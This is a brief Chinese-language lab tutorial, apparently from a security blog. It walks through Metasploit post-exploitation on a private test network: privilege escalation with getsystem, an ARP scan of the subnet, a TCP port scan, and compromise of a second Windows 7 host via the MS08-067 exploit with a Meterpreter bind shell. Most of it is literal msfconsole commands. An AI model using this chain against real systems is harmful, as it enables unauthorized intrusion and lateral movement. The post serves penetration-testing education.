每天早上醒來你有兩個選擇:一是蓋上被子繼續做你沒做完的夢,二是掀開被子去完成你未完成的夢。。。
---- 網易雲熱評
環境:小攻:Kali 2020,ip:192.168.1.133
小受:win7 x86,ip:192.168.1.144
小小受:win7 x64 ,ip: 192.168.1.130
一、生成木馬及監聽主機參考上篇文章:
二、獲取小受的IP地址
meterpreter > getsystem
三、獲取內網中存活的主機,以一臺win03主機爲例
meterpreter > run post/windows/gather/arp_scanner rhosts=192.168.1.0/24
四、端口掃描,看看小小受開放了那些端口
1、選擇用到的模塊:msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
2、查看需要配置的參數:show options
3、設置要掃描的端口:msf5 auxiliary(scanner/portscan/tcp) > set ports 80,135,445,3389,3306
4、設置小小受ip地址:msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.130
5、執行:msf5 auxiliary(scanner/portscan/tcp) > run
五、利用ms08_067漏洞拿下小小受
1、搜索ms08_067模塊信息
msf5 auxiliary(scanner/portscan/tcp) > search ms08_067
2、選擇該模塊並設置payload
msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
3、查看需要配置的參數:
msf5 exploit(windows/smb/ms08_067_netapi) > show options
4、設置目標主機並執行
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.1.130
msf5 exploit(windows/smb/ms08_067_netapi) > run
禁止非法,後果自負
歡迎關注公衆號:web安全工具庫